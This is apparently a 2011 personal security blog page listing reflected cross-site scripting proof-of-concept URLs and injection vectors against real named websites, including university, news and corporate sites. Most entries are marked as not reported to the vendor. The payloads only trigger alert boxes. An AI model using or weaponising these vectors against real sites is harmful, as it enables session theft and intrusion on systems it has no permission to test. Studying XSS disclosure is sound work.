This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.

NESN

Date: Apr-26-2011
Vendor Notified: No
Proof of Concept:
http://stats.nesn.com/nhl/teamstats.asp?teamno=&type=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E


The Technical College Reykjavik

Date: Apr-10-2011
Vendor Notified: No
Proof of Concept:
http://en.tskoli.is/leit?SearchFor=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E


MSNBC

Date: Mar-25-2011
Vendor Notified: No
Proof of Concept:
http://scores.nbcsports.msnbc.com/fb/teamstats.asp?type=%22%3E%3Cscript%3Ealert(%270%27);%3C/script%3E


UN Multimedia

Date: Mar-21-2011
Vendor Notified: No
Proof of Concept:
http://www.unmultimedia.org/photo/detail.jsp?id=403/403478&key=2&query=%3C/script%3E%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

 

Vectors:

  • <script type="text/javascript"> sendRequest('2', '2', '</script>"><script>alert(0)</script>', '', ''); </script>

McDonald’s

Date: Mar-07-2011
Vendor Notified: No
Proof of Concept:
http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%27%3E%3Cscript%3Ealert(%270%27)%3C/script%3E


Harvard

Date: Mar-05-2011
Vendor Notified: No
Proof of Concept:
http://college.harvard.edu/icb/icb.do?keyword=k61161&pageid=icb.page316368&pageContentId=icb.pagecontent828781&view=view.do&state=maximize&viewParam_q=%3Cscript%3Ealert(%270%27);%3C/script%3E


MIT

Date: Mar-05-2011
Vendor Notified: No
Proof of Concept:
http://web.mit.edu/bin/cgicso?query=%22;//--%3E%22%3E%27%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E


MTV

Date: Mar-03-2011
Vendor Notified: No
Proof of Concept:
http://www.mtv.com/search/?q=%3C/script%3E%3Cscript%3Ealert(%270%27);%3C/script%3E

 

Vectors:

  • </script><script>alert('0');</script>

NPR

Date: Mar-01-2011
Vendor Notified: Yes
Proof of Concept:
http://www.npr.org/search/index.php?searchinput=alert(0);%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(0);%3C/script%3E

 

Vectors:

  • alert(0);</script>">'><script>alert(0);</script>
  • ';alert(0)//\';//";//\";alert(0)//--></script>">'><script>alert(0)</script>

ABC

Date: Mar-01-2011
Vendor Notified: No
Proof of Concept:
http://abc.go.com/search?search=%22%3E%3Cscript%3Ealert(%270%27);%3C/script%3E

 

Vectors:

  • "><script>alert('0');</script>
  • <script>alert('0');</script>

Copyright © 2012 benburns.org